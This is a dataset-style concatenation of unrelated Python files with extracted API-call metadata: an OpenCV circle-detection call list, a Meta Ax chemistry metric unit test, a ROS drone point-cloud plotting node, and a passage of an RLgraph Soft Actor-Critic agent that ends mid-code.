[((40, 64), 'cv2.imread', 'cv2.imread', (['"""imagem.jpg"""'], {}), "('imagem.jpg')\n", (50, 64), False, 'import cv2\n'), ((103, 128), 'cv2.imshow', 'cv2.imshow', (['"""imagem"""', 'img'], {}), "('imagem', img)\n", (113, 128), False, 'import cv2\n'), ((135, 167), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['img', '(7, 5)', '(0)'], {}), '(img, (7, 5), 0)\n', (151, 167), False, 'import cv2\n'), ((169, 198), 'cv2.imshow', 'cv2.imshow', (['"""imagemblur"""', 'img'], {}), "('imagemblur', img)\n", (179, 198), False, 'import cv2\n'), ((210, 247), 'cv2.cvtColor', 'cv2.cvtColor', (['img', 'cv2.COLOR_RGB2GRAY'], {}), '(img, cv2.COLOR_RGB2GRAY)\n', (222, 247), False, 'import cv2\n'), ((262, 368), 'cv2.HoughCircles', 'cv2.HoughCircles', (['gray_img', 'cv2.HOUGH_GRADIENT', '(1)', '(30)'], {'param1': '(50)', 'param2': '(30)', 'minRadius': '(0)', 'maxRadius': '(60)'}), '(gray_img, cv2.HOUGH_GRADIENT, 1, 30, param1=50, param2=30,\n minRadius=0, maxRadius=60)\n', (278, 368), False, 'import cv2\n'), ((635, 681), 'cv2.circle', 'cv2.circle', (['cimg', '(0, 0)', 'i[2]', '(0, 0, 255)', '(2)'], {}), '(cimg, (0, 0), i[2], (0, 0, 255), 2)\n', (645, 681), False, 'import cv2\n'), ((676, 726), 'cv2.circle', 'cv2.circle', (['cimg', '(390, 390)', 'i[2]', '(255, 0, 0)', '(2)'], {}), '(cimg, (390, 390), i[2], (255, 0, 0), 2)\n', (686, 726), False, 'import cv2\n'), ((723, 759), 'cv2.imshow', 'cv2.imshow', (['"""detected circles"""', 'cimg'], {}), "('detected circles', cimg)\n", (733, 759), False, 'import cv2\n'), ((760, 774), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (771, 774), False, 'import cv2\n'), ((776, 799), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (797, 799), False, 'import cv2\n'), ((423, 441), 'numpy.around', 'np.around', (['circles'], {}), '(circles)\n', (432, 441), True, 'import numpy as np\n'), ((501, 553), 'cv2.circle', 'cv2.circle', (['cimg', '(i[0], i[1])', 'i[2]', '(0, 255, 0)', '(2)'], {}), '(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)\n', (511, 553), False, 'import cv2\n'), ((589, 638), 'cv2.circle', 'cv2.circle', (['cimg', '(i[0], i[1])', '(2)', '(0, 0, 255)', '(3)'], {}), '(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)\n', (599, 638), False, 'import cv2\n')]
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from enum import Enum
from unittest import mock
import numpy as np
import pandas as pd
from ax.core.arm import Arm
from ax.core.generator_run import GeneratorRun
from ax.metrics.chemistry import ChemistryMetric, ChemistryProblemType
from ax.utils.common.testutils import TestCase
from ax.utils.testing.core_stubs import get_trial
class DummyEnum(Enum):
DUMMY: str = "dummy"
class ChemistryMetricTest(TestCase):
def testChemistryMetric(self):
# basic test
read_csv = pd.read_csv
for problem_type in (
ChemistryProblemType.DIRECT_ARYLATION,
ChemistryProblemType.SUZUKI,
):
with mock.patch(
"ax.metrics.chemistry.pd.read_csv",
wraps=lambda filename, index_col: read_csv(
filename, index_col=index_col, nrows=1
),
) as mock_read_csv:
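                # (Added note, hedged): wrapping pd.read_csv with nrows=1 presumably keeps the
                # test fast by loading only the first row of the benchmark CSV, while
                # call_count below still verifies that results are cached after one read.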
metric = ChemistryMetric(name="test_metric", problem_type=problem_type)
self.assertFalse(metric.noiseless)
self.assertIs(metric.problem_type, problem_type)
self.assertFalse(metric.lower_is_better)
if problem_type is ChemistryProblemType.DIRECT_ARYLATION:
param_names = [
"Base_SMILES",
"Concentration",
"Ligand_SMILES",
"Solvent_SMILES",
"Temp_C",
]
param_values = (
"O=C([O-])C.[K+]",
0.1,
(
"CC(C)C1=CC(C(C)C)=C(C(C(C)C)=C1)C2=C(P(C3CCCCC3)"
"C4CCCCC4)C(OC)=CC=C2OC"
),
"CC(N(C)C)=O",
105,
)
obj = 5.47
else:
param_names = [
"Base_SMILES",
"Electrophile_SMILES",
"Ligand_SMILES",
"Nucleophile_SMILES",
"Solvent_SMILES",
]
param_values = (
"[Na+].[OH-]",
"ClC1=CC=C(N=CC=C2)C2=C1",
"CC(P(C(C)(C)C)C(C)(C)C)(C)C",
"CC1=CC=C(N(C2CCCCO2)N=C3)C3=C1B(O)O",
"N#CC",
)
obj = 4.76
params = dict(zip(param_names, param_values))
trial = get_trial()
trial._generator_run = GeneratorRun(
arms=[Arm(name="0_0", parameters=params)]
)
df = metric.fetch_trial_data(trial).df
self.assertEqual(mock_read_csv.call_count, 1)
self.assertEqual(df["mean"].values[0], obj)
self.assertTrue(np.isnan(df["sem"].values[0]))
# test caching
metric.fetch_trial_data(trial)
self.assertEqual(mock_read_csv.call_count, 1)
# test noiseless
metric = ChemistryMetric(
name="test_metric", problem_type=problem_type, noiseless=True
)
df = metric.fetch_trial_data(trial).df
self.assertEqual(df["sem"].values[0], 0.0)
|
[
"ax.core.arm.Arm",
"ax.metrics.chemistry.ChemistryMetric",
"ax.utils.testing.core_stubs.get_trial",
"numpy.isnan"
] |
[((1119, 1181), 'ax.metrics.chemistry.ChemistryMetric', 'ChemistryMetric', ([], {'name': '"""test_metric"""', 'problem_type': 'problem_type'}), "(name='test_metric', problem_type=problem_type)\n", (1134, 1181), False, 'from ax.metrics.chemistry import ChemistryMetric, ChemistryProblemType\n'), ((2811, 2822), 'ax.utils.testing.core_stubs.get_trial', 'get_trial', ([], {}), '()\n', (2820, 2822), False, 'from ax.utils.testing.core_stubs import get_trial\n'), ((3395, 3473), 'ax.metrics.chemistry.ChemistryMetric', 'ChemistryMetric', ([], {'name': '"""test_metric"""', 'problem_type': 'problem_type', 'noiseless': '(True)'}), "(name='test_metric', problem_type=problem_type, noiseless=True)\n", (3410, 3473), False, 'from ax.metrics.chemistry import ChemistryMetric, ChemistryProblemType\n'), ((3165, 3194), 'numpy.isnan', 'np.isnan', (["df['sem'].values[0]"], {}), "(df['sem'].values[0])\n", (3173, 3194), True, 'import numpy as np\n'), ((2902, 2936), 'ax.core.arm.Arm', 'Arm', ([], {'name': '"""0_0"""', 'parameters': 'params'}), "(name='0_0', parameters=params)\n", (2905, 2936), False, 'from ax.core.arm import Arm\n')]
|
import rospy
from sensor_msgs.msg import PointCloud2
from sensor_msgs import point_cloud2
from geometry_msgs.msg import PoseArray, Pose
from tf.transformations import euler_from_quaternion
import time
import math
import struct
import ctypes
from scipy import ndimage
import matplotlib.pyplot as plt
from nav_msgs.msg import Odometry
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
class identifyObstacle3D:
def __init__(self):
self.currentPosX, self.currentPosY, self.currentPosZ, self.currentPosYaw = 2, 2, 2, 0
self.count = 0
self.unic = 0
self.pub = rospy.Publisher('/build_map3D', PoseArray, queue_size=1)
self.all = []
self.obsX, self.obsY, self.obsZ = [], [], []
self.t = time.time()
self.number_of_sampling = 30
rospy.init_node("obstacle3D")
print("Start")
# _ = rospy.Subscriber("/uav1/velodyne/scan", PointCloud2, self.callbackObstacle)
_ = rospy.Subscriber("/uav1/rs_d435/depth/points", PointCloud2, self.callbackObstacle)
_ = rospy.Subscriber("/uav1/odometry/odom_main", Odometry, self.callbackPosicao)
def callbackPosicao(self, odom):
_, _, yaw = euler_from_quaternion([odom.pose.pose.orientation.x, odom.pose.pose.orientation.y, odom.pose.pose.orientation.z, odom.pose.pose.orientation.w])
if self.count == 0:
self.lastYaw = yaw
self.currentPosX = odom.pose.pose.position.x
self.currentPosY = odom.pose.pose.position.y
        self.currentPosZ = odom.pose.pose.position.z
self.currentPosYaw = yaw
self.count += 1
def rotationMatrix(self, psi0, x1, y1, z1):
r = [[np.cos(psi0), np.sin(psi0) * -1, 0], [np.sin(psi0), np.cos(psi0), 0], [0, 0, 1]]
pos_local = np.dot(np.transpose(np.asarray(r)), np.asarray([x1, y1, z1]))
return pos_local
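    # (Added note, hedged): `r` above is the standard z-axis (yaw) rotation; multiplying by
    # its transpose maps world coordinates into the body frame. With psi0 = 0, as used in
    # callbackObstacle below, the transform is the identity and points pass through unchanged.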
def callbackObstacle(self, data):
print(time.time()-self.t)
if self.count > 0:
a4, a5, a6 = [], [], []
a1, a2, a3 = [], [], []
x, y, z = [], [], []
abc = []
matriz = np.zeros((101, 101))
xyz = np.array([[0,0,0]])
gen = point_cloud2.read_points(data, skip_nans=True)
int_data = list(gen)
            for pt in int_data:
                if round(pt[2]) > 0 and [round(pt[0]), round(-pt[1]), round(pt[2])] not in abc:
                    a4.append(round(pt[0]))
                    a5.append(round(-pt[1]))
                    a6.append(round(pt[2]))
                    abc.append([round(pt[0]), round(-pt[1]), round(pt[2])])
pl = self.rotationMatrix(0, a4, a5, a6)
for i1, i2, i3 in zip(pl[0], pl[1], pl[2]):
a1.append(i2)
a2.append(i1)
a3.append(i3)
xyz = np.append(xyz,[[i2, i1, i3]], axis = 0)
self.count += 1
if 8<time.time()-self.t<13:
ax = plt.axes(projection = "3d")
ax.plot3D(a1, a2, a3, 'y.')
ax.plot3D([self.currentPosX], [self.currentPosY], [self.currentPosZ], ".r")
ax.set_xlim(0,20)
ax.set_ylim(0,20)
ax.set_zlim(0,20)
ax.set_xlabel("x (m)" + str(self.currentPosX))
ax.set_ylabel("y (m)" + str(self.currentPosY))
ax.set_zlabel("z (m)" + str(self.currentPosZ))
ax.view_init(50, -137)
plt.pause(0.01)
plt.show()
def main():
identifyObstacle3D()
try:
rospy.spin()
except rospy.ROSInterruptException:
pass
if __name__ == '__main__':
main()
|
[
"rospy.Subscriber",
"sensor_msgs.point_cloud2.read_points",
"matplotlib.pyplot.show",
"matplotlib.pyplot.axes",
"numpy.asarray",
"numpy.zeros",
"rospy.Publisher",
"time.time",
"numpy.append",
"numpy.sin",
"numpy.array",
"rospy.init_node",
"numpy.cos",
"tf.transformations.euler_from_quaternion",
"rospy.spin",
"matplotlib.pyplot.pause"
] |
[((602, 658), 'rospy.Publisher', 'rospy.Publisher', (['"""/build_map3D"""', 'PoseArray'], {'queue_size': '(1)'}), "('/build_map3D', PoseArray, queue_size=1)\n", (617, 658), False, 'import rospy\n'), ((751, 762), 'time.time', 'time.time', ([], {}), '()\n', (760, 762), False, 'import time\n'), ((810, 839), 'rospy.init_node', 'rospy.init_node', (['"""obstacle3D"""'], {}), "('obstacle3D')\n", (825, 839), False, 'import rospy\n'), ((966, 1053), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/uav1/rs_d435/depth/points"""', 'PointCloud2', 'self.callbackObstacle'], {}), "('/uav1/rs_d435/depth/points', PointCloud2, self.\n callbackObstacle)\n", (982, 1053), False, 'import rospy\n'), ((1061, 1137), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/uav1/odometry/odom_main"""', 'Odometry', 'self.callbackPosicao'], {}), "('/uav1/odometry/odom_main', Odometry, self.callbackPosicao)\n", (1077, 1137), False, 'import rospy\n'), ((1196, 1344), 'tf.transformations.euler_from_quaternion', 'euler_from_quaternion', (['[odom.pose.pose.orientation.x, odom.pose.pose.orientation.y, odom.pose.pose\n .orientation.z, odom.pose.pose.orientation.w]'], {}), '([odom.pose.pose.orientation.x, odom.pose.pose.\n orientation.y, odom.pose.pose.orientation.z, odom.pose.pose.orientation.w])\n', (1217, 1344), False, 'from tf.transformations import euler_from_quaternion\n'), ((3598, 3610), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (3608, 3610), False, 'import rospy\n'), ((1834, 1858), 'numpy.asarray', 'np.asarray', (['[x1, y1, z1]'], {}), '([x1, y1, z1])\n', (1844, 1858), True, 'import numpy as np\n'), ((2132, 2152), 'numpy.zeros', 'np.zeros', (['(101, 101)'], {}), '((101, 101))\n', (2140, 2152), True, 'import numpy as np\n'), ((2171, 2192), 'numpy.array', 'np.array', (['[[0, 0, 0]]'], {}), '([[0, 0, 0]])\n', (2179, 2192), True, 'import numpy as np\n'), ((2212, 2258), 'sensor_msgs.point_cloud2.read_points', 'point_cloud2.read_points', (['data'], {'skip_nans': '(True)'}), '(data, skip_nans=True)\n', (2236, 2258), False, 'from sensor_msgs import point_cloud2\n'), ((1697, 1709), 'numpy.cos', 'np.cos', (['psi0'], {}), '(psi0)\n', (1703, 1709), True, 'import numpy as np\n'), ((1735, 1747), 'numpy.sin', 'np.sin', (['psi0'], {}), '(psi0)\n', (1741, 1747), True, 'import numpy as np\n'), ((1749, 1761), 'numpy.cos', 'np.cos', (['psi0'], {}), '(psi0)\n', (1755, 1761), True, 'import numpy as np\n'), ((1818, 1831), 'numpy.asarray', 'np.asarray', (['r'], {}), '(r)\n', (1828, 1831), True, 'import numpy as np\n'), ((1938, 1949), 'time.time', 'time.time', ([], {}), '()\n', (1947, 1949), False, 'import time\n'), ((2853, 2891), 'numpy.append', 'np.append', (['xyz', '[[i2, i1, i3]]'], {'axis': '(0)'}), '(xyz, [[i2, i1, i3]], axis=0)\n', (2862, 2891), True, 'import numpy as np\n'), ((2984, 3009), 'matplotlib.pyplot.axes', 'plt.axes', ([], {'projection': '"""3d"""'}), "(projection='3d')\n", (2992, 3009), True, 'import matplotlib.pyplot as plt\n'), ((3498, 3513), 'matplotlib.pyplot.pause', 'plt.pause', (['(0.01)'], {}), '(0.01)\n', (3507, 3513), True, 'import matplotlib.pyplot as plt\n'), ((3530, 3540), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3538, 3540), True, 'import matplotlib.pyplot as plt\n'), ((1711, 1723), 'numpy.sin', 'np.sin', (['psi0'], {}), '(psi0)\n', (1717, 1723), True, 'import numpy as np\n'), ((2940, 2951), 'time.time', 'time.time', ([], {}), '()\n', (2949, 2951), False, 'import time\n')]
|
# Copyright 2018/2019 The RLgraph authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import, division, print_function
import numpy as np
from rlgraph import get_backend
from rlgraph.agents import Agent
from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay
from rlgraph.components.loss_functions.sac_loss_function import SACLossFunction
from rlgraph.spaces import FloatBox, BoolBox, IntBox, ContainerSpace
from rlgraph.spaces.space_utils import sanity_check_space
from rlgraph.utils import RLGraphError
from rlgraph.utils.decorators import rlgraph_api, graph_fn
from rlgraph.utils.ops import flatten_op, DataOpTuple
from rlgraph.utils.util import strip_list, force_list
if get_backend() == "tf":
import tensorflow as tf
elif get_backend() == "pytorch":
import torch
class SyncSpecification(object):
"""Describes a synchronization schedule, used to update the target value weights. The target values are gradually
updates using exponential moving average as suggested by the paper."""
def __init__(self, sync_interval=None, sync_tau=None):
"""
Arguments:
sync_interval: How often to update the target.
sync_tau: The smoothing constant to use in the averaging. Setting to 1 replaces the values each iteration.
"""
self.sync_interval = sync_interval
self.sync_tau = sync_tau
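# A minimal illustration of the soft ("Polyak") update that sync_tau implies for each
# target weight; target_w and source_w are hypothetical plain arrays and this helper is
# not used elsewhere in this file. With tau == 1.0 the target weights are replaced outright.
def _soft_update_sketch(target_w, source_w, tau):
    return tau * source_w + (1.0 - tau) * target_w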
class SACAgentComponent(Component):
def __init__(self, agent, policy, q_function, preprocessor, memory, discount, initial_alpha, target_entropy,
optimizer, vf_optimizer, alpha_optimizer, q_sync_spec, num_q_functions=2):
super(SACAgentComponent, self).__init__(nesting_level=0)
self.agent = agent
self._policy = policy
self._preprocessor = preprocessor
self._memory = memory
self._q_functions = [q_function]
self._q_functions += [q_function.copy(scope="{}-{}".format(q_function.scope, i + 1), trainable=True)
for i in range(num_q_functions - 1)]
# Set number of return values for get_q_values graph_fn.
self.graph_fn_num_outputs["_graph_fn_get_q_values"] = num_q_functions
for q in self._q_functions:
# TODO: is there a better way to do this?
if "synchronizable" not in q.sub_components:
q.add_components(Synchronizable(), expose_apis="sync")
self._target_q_functions = [q.copy(scope="target-" + q.scope, trainable=True) for q in self._q_functions]
for target_q in self._target_q_functions:
# TODO: is there a better way to do this?
if "synchronizable" not in target_q.sub_components:
target_q.add_components(Synchronizable(), expose_apis="sync")
self._optimizer = optimizer
self.vf_optimizer = vf_optimizer
self.alpha_optimizer = alpha_optimizer
self.initial_alpha = initial_alpha
self.log_alpha = None
self.target_entropy = target_entropy
self.loss_function = SACLossFunction(target_entropy=target_entropy, discount=discount,
num_q_functions=num_q_functions)
memory_items = ["states", "actions", "rewards", "next_states", "terminals"]
self._merger = ContainerMerger(*memory_items)
q_names = ["q_{}".format(i) for i in range(len(self._q_functions))]
self._q_vars_merger = ContainerMerger(*q_names, scope="q_vars_merger")
self.add_components(policy, preprocessor, memory, self._merger, self.loss_function,
optimizer, vf_optimizer, self._q_vars_merger) # , self._q_vars_splitter)
self.add_components(*self._q_functions)
self.add_components(*self._target_q_functions)
if self.alpha_optimizer is not None:
self.add_components(self.alpha_optimizer)
self.steps_since_last_sync = None
self.q_sync_spec = q_sync_spec
self.env_action_space = None
self.episode_reward = None
def check_input_spaces(self, input_spaces, action_space=None):
for s in ["states", "actions", "env_actions", "preprocessed_states", "rewards", "terminals"]:
sanity_check_space(input_spaces[s], must_have_batch_rank=True)
self.env_action_space = input_spaces["env_actions"].flatten()
def create_variables(self, input_spaces, action_space=None):
self.steps_since_last_sync = self.get_variable("steps_since_last_sync", dtype="int", initializer=0)
self.log_alpha = self.get_variable("log_alpha", dtype="float", initializer=np.log(self.initial_alpha))
self.episode_reward = self.get_variable("episode_reward", shape=(), initializer=0.0)
@rlgraph_api
def get_policy_weights(self):
return self._policy.variables()
@rlgraph_api
def get_q_weights(self):
merged_weights = self._q_vars_merger.merge(*[q.variables() for q in self._q_functions])
return merged_weights
@rlgraph_api(must_be_complete=False)
def set_policy_weights(self, weights):
return self._policy.sync(weights)
""" TODO: need to define the input space
@rlgraph_api(must_be_complete=False)
def set_q_weights(self, q_weights):
split_weights = self._q_vars_splitter.call(q_weights)
assert len(split_weights) == len(self._q_functions)
update_ops = [q.sync(q_weights) for q_weights, q in zip(split_weights, self._q_functions)]
update_ops.extend([q.sync(q_weights) for q_weights, q in zip(split_weights, self._target_q_functions)])
return tuple(update_ops)
"""
@rlgraph_api
def preprocess_states(self, states):
return self._preprocessor.preprocess(states)
@rlgraph_api
def insert_records(self, preprocessed_states, env_actions, rewards, next_states, terminals):
records = self._merger.merge(preprocessed_states, env_actions, rewards, next_states, terminals)
return self._memory.insert_records(records)
@rlgraph_api
def update_from_memory(self, batch_size=64, time_percentage=None):
records, sample_indices, importance_weights = self._memory.get_records(batch_size)
result = self.update_from_external_batch(
records["states"], records["actions"], records["rewards"], records["terminals"],
records["next_states"], importance_weights, time_percentage
)
if isinstance(self._memory, PrioritizedReplay):
update_pr_step_op = self._memory.update_records(sample_indices, result["critic_loss_per_item"])
result["update_pr_step_op"] = update_pr_step_op
return result
@rlgraph_api
def update_from_external_batch(
self, preprocessed_states, env_actions, rewards, terminals, next_states, importance_weights,
time_percentage=None
):
actions = self._graph_fn_one_hot(env_actions)
actor_loss, actor_loss_per_item, critic_loss, critic_loss_per_item, alpha_loss, alpha_loss_per_item = \
self.get_losses(preprocessed_states, actions, rewards, terminals, next_states, importance_weights)
policy_vars = self._policy.variables()
q_vars = [q_func.variables() for q_func in self._q_functions]
merged_q_vars = self._q_vars_merger.merge(*q_vars)
critic_step_op = self.vf_optimizer.step(merged_q_vars, critic_loss, critic_loss_per_item, time_percentage)
actor_step_op = self._optimizer.step(policy_vars, actor_loss, actor_loss_per_item, time_percentage)
if self.target_entropy is not None:
alpha_step_op = self._graph_fn_update_alpha(alpha_loss, alpha_loss_per_item, time_percentage)
else:
alpha_step_op = self._graph_fn_no_op()
# TODO: optimizer for alpha
sync_op = self.sync_targets()
# Increase the global training step counter.
alpha_step_op = self._graph_fn_training_step(alpha_step_op)
return dict(
actor_step_op=actor_step_op,
critic_step_op=critic_step_op,
sync_op=sync_op,
alpha_step_op=alpha_step_op,
actor_loss=actor_loss,
actor_loss_per_item=actor_loss_per_item,
critic_loss=critic_loss,
critic_loss_per_item=critic_loss_per_item,
alpha_loss=alpha_loss,
alpha_loss_per_item=alpha_loss_per_item
)
@graph_fn(flatten_ops=True, split_ops=True, add_auto_key_as_first_param=True)
def _graph_fn_one_hot(self, key, env_actions):
if isinstance(self.env_action_space[key], IntBox):
env_actions = tf.one_hot(env_actions, depth=self.env_action_space[key].num_categories, axis=-1)
return env_actions
@graph_fn(requires_variable_completeness=True)
def _graph_fn_update_alpha(self, alpha_loss, alpha_loss_per_item, time_percentage=None):
alpha_step_op = self.alpha_optimizer.step(
DataOpTuple([self.log_alpha]), alpha_loss, alpha_loss_per_item, time_percentage
)
return alpha_step_op
@rlgraph_api # `returns` are determined in ctor
def _graph_fn_get_q_values(self, preprocessed_states, actions, target=False):
backend = get_backend()
flat_actions = flatten_op(actions)
actions = []
for flat_key, action_component in self._policy.action_space.flatten().items():
actions.append(flat_actions[flat_key])
if backend == "tf":
actions = tf.concat(actions, axis=-1)
elif backend == "pytorch":
actions = torch.cat(actions, dim=-1)
q_funcs = self._q_functions if target is False else self._target_q_functions
# We do not concat states yet because we might pass states through a conv stack before merging it
# with actions.
return tuple(q.state_action_value(preprocessed_states, actions) for q in q_funcs)
@rlgraph_api
def get_losses(self, preprocessed_states, actions, rewards, terminals, next_states, importance_weights):
# TODO: internal states
samples_next = self._policy.get_action_and_log_likelihood(next_states, deterministic=False)
next_sampled_actions = samples_next["action"]
log_probs_next_sampled = samples_next["log_likelihood"]
q_values_next_sampled = self.get_q_values(
next_states, next_sampled_actions, target=True
)
q_values = self.get_q_values(preprocessed_states, actions)
samples = self._policy.get_action_and_log_likelihood(preprocessed_states, deterministic=False)
sampled_actions = samples["action"]
log_probs_sampled = samples["log_likelihood"]
q_values_sampled = self.get_q_values(preprocessed_states, sampled_actions)
alpha = self._graph_fn_compute_alpha()
return self.loss_function.loss(
alpha,
log_probs_next_sampled,
q_values_next_sampled,
q_values,
log_probs_sampled,
q_values_sampled,
rewards,
terminals
)
@rlgraph_api
def get_preprocessed_state_and_action(self, states, deterministic=False):
preprocessed_states = self._preprocessor.preprocess(states)
return self.action_from_preprocessed_state(preprocessed_states, deterministic)
@rlgraph_api
def action_from_preprocessed_state(self, preprocessed_states, deterministic=False):
out = self._policy.get_action(preprocessed_states, deterministic=deterministic)
return out["action"], preprocessed_states
@rlgraph_api(requires_variable_completeness=True)
def reset_targets(self):
ops = (target_q.sync(q.variables()) for q, target_q in zip(self._q_functions, self._target_q_functions))
return tuple(ops)
@rlgraph_api(requires_variable_completeness=True)
def sync_targets(self):
should_sync = self._graph_fn_get_should_sync()
return self._graph_fn_sync(should_sync)
@rlgraph_api
def get_memory_size(self):
return self._memory.get_size()
@graph_fn
def _graph_fn_compute_alpha(self):
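        # alpha is stored and optimized in log space (see create_variables and
        # _graph_fn_update_alpha); exponentiating here keeps the entropy
        # temperature strictly positive.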
backend = get_backend()
if backend == "tf":
return tf.exp(self.log_alpha)
elif backend == "pytorch":
return torch.exp(self.log_alpha)
# TODO: Move this into generic AgentRootComponent.
@graph_fn
def _graph_fn_training_step(self, other_step_op=None):
if self.agent is not None:
add_op = tf.assign_add(self.agent.graph_executor.global_training_timestep, 1)
op_list = [add_op] + [other_step_op] if other_step_op is not None else []
with tf.control_dependencies(op_list):
return tf.no_op() if other_step_op is None else other_step_op
else:
return tf.no_op() if other_step_op is None else other_step_op
@graph_fn(returns=1, requires_variable_completeness=True)
def _graph_fn_get_should_sync(self):
if get_backend() == "tf":
inc_op = tf.assign_add(self.steps_since_last_sync, 1)
should_sync = inc_op >= self.q_sync_spec.sync_interval
def reset_op():
op = tf.assign(self.steps_since_last_sync, 0)
with tf.control_dependencies([op]):
return tf.no_op()
sync_op = tf.cond(
pred=inc_op >= self.q_sync_spec.sync_interval,
true_fn=reset_op,
false_fn=tf.no_op
)
with tf.control_dependencies([sync_op]):
return tf.identity(should_sync)
else:
raise NotImplementedError("TODO")
@graph_fn(returns=1, requires_variable_completeness=True)
def _graph_fn_sync(self, should_sync):
assign_ops = []
tau = self.q_sync_spec.sync_tau
if tau != 1.0:
all_source_vars = [source.get_variables(collections=None, custom_scope_separator="-") for source in self._q_functions]
all_dest_vars = [destination.get_variables(collections=None, custom_scope_separator="-") for destination in self._target_q_functions]
for source_vars, dest_vars in zip(all_source_vars, all_dest_vars):
for (source_key, source_var), (dest_key, dest_var) in zip(sorted(source_vars.items()), sorted(dest_vars.items())):
assign_ops.append(tf.assign(dest_var, tau * source_var + (1.0 - tau) * dest_var))
else:
all_source_vars = [source.variables() for source in self._q_functions]
for source_vars, destination in zip(all_source_vars, self._target_q_functions):
assign_ops.append(destination.sync(source_vars))
assert len(assign_ops) > 0
grouped_op = tf.group(assign_ops)
def assign_op():
# Make sure we are returning no_op as opposed to reference
with tf.control_dependencies([grouped_op]):
return tf.no_op()
cond_assign_op = tf.cond(should_sync, true_fn=assign_op, false_fn=tf.no_op)
with tf.control_dependencies([cond_assign_op]):
return tf.no_op()
@graph_fn
def _graph_fn_no_op(self):
return tf.no_op()
@rlgraph_api
def get_global_timestep(self):
return self.read_variable(self.agent.graph_executor.global_timestep)
@rlgraph_api
def _graph_fn_update_global_timestep(self, increment):
if get_backend() == "tf":
add_op = tf.assign_add(self.agent.graph_executor.global_timestep, increment)
return add_op
elif get_backend == "pytorch":
self.agent.graph_executor.global_timestep += increment
return self.agent.graph_executor.global_timestep
@rlgraph_api
def _graph_fn_get_episode_reward(self):
return self.episode_reward
@rlgraph_api
def _graph_fn_set_episode_reward(self, episode_reward):
return tf.assign(self.episode_reward, episode_reward)
class SACAgent(Agent):
def __init__(
self,
state_space,
action_space,
discount=0.98,
preprocessing_spec=None,
network_spec=None,
internal_states_space=None,
policy_spec=None,
value_function_spec=None,
execution_spec=None,
optimizer_spec=None,
value_function_optimizer_spec=None,
observe_spec=None,
update_spec=None,
summary_spec=None,
saver_spec=None,
auto_build=True,
name="sac-agent",
double_q=True,
initial_alpha=1.0,
gumbel_softmax_temperature=1.0,
target_entropy=None,
memory_spec=None,
value_function_sync_spec=None
):
"""
        This is an implementation of the Soft Actor-Critic (SAC) algorithm.
Paper: http://arxiv.org/abs/1801.01290
Args:
state_space (Union[dict,Space]): Spec dict for the state Space or a direct Space object.
action_space (Union[dict,Space]): Spec dict for the action Space or a direct Space object.
preprocessing_spec (Optional[list,PreprocessorStack]): The spec list for the different necessary states
preprocessing steps or a PreprocessorStack object itself.
discount (float): The discount factor (gamma).
network_spec (Optional[list,NeuralNetwork]): Spec list for a NeuralNetwork Component or the NeuralNetwork
object itself.
internal_states_space (Optional[Union[dict,Space]]): Spec dict for the internal-states Space or a direct
Space object for the Space(s) of the internal (RNN) states.
policy_spec (Optional[dict]): An optional dict for further kwargs passing into the Policy c'tor.
value_function_spec (list, dict, ValueFunction): Neural network specification for baseline or instance
of ValueFunction.
execution_spec (Optional[dict,Execution]): The spec-dict specifying execution settings.
optimizer_spec (Optional[dict,Optimizer]): The spec-dict to create the Optimizer for this Agent.
value_function_optimizer_spec (dict): Optimizer config for value function optimizer. If None, the optimizer
spec for the policy is used (same learning rate and optimizer type).
observe_spec (Optional[dict]): Spec-dict to specify `Agent.observe()` settings.
update_spec (Optional[dict]): Spec-dict to specify `Agent.update()` settings.
summary_spec (Optional[dict]): Spec-dict to specify summary settings.
saver_spec (Optional[dict]): Spec-dict to specify saver settings.
auto_build (Optional[bool]): If True (default), immediately builds the graph using the agent's
graph builder. If false, users must separately call agent.build(). Useful for debugging or analyzing
components before building.
name (str): Some name for this Agent object.
double_q (bool): Whether to train two q networks independently.
initial_alpha (float): "The temperature parameter α determines the
relative importance of the entropy term against the reward".
gumbel_softmax_temperature (float): Temperature parameter for the Gumbel-Softmax distribution used
for discrete actions.
memory_spec (Optional[dict,Memory]): The spec for the Memory to use for the DQN algorithm.
update_spec (dict): Here we can have sync_interval or sync_tau (for the value network update).
"""
# If VF spec is a network spec, wrap with SAC vf type. The VF must concatenate actions and states,
# which can require splitting the network in the case of e.g. conv-inputs.
if isinstance(value_function_spec, list):
value_function_spec = dict(type="sac_value_function", network_spec=value_function_spec)
self.logger.info("Using default SAC value function.")
elif isinstance(value_function_spec, ValueFunction):
self.logger.info("Using value function object {}".format(ValueFunction))
if policy_spec is None:
# Continuous action space: Use squashed normal.
# Discrete: Gumbel-softmax.
policy_spec = dict(deterministic=False,
distributions_spec=dict(
bounded_distribution_type="squashed",
discrete_distribution_type="gumbel_softmax",
gumbel_softmax_temperature=gumbel_softmax_temperature
))
super(SACAgent, self).__init__(
state_space=state_space,
action_space=action_space,
discount=discount,
preprocessing_spec=preprocessing_spec,
network_spec=network_spec,
internal_states_space=internal_states_space,
policy_spec=policy_spec,
value_function_spec=value_function_spec,
execution_spec=execution_spec,
optimizer_spec=optimizer_spec,
value_function_optimizer_spec=value_function_optimizer_spec,
observe_spec=observe_spec,
update_spec=update_spec,
summary_spec=summary_spec,
saver_spec=saver_spec,
auto_build=auto_build,
name=name
)
self.double_q = double_q
self.target_entropy = target_entropy
self.initial_alpha = initial_alpha
        # Assert that the sync interval is a multiple of the update interval.
if "sync_interval" in self.update_spec:
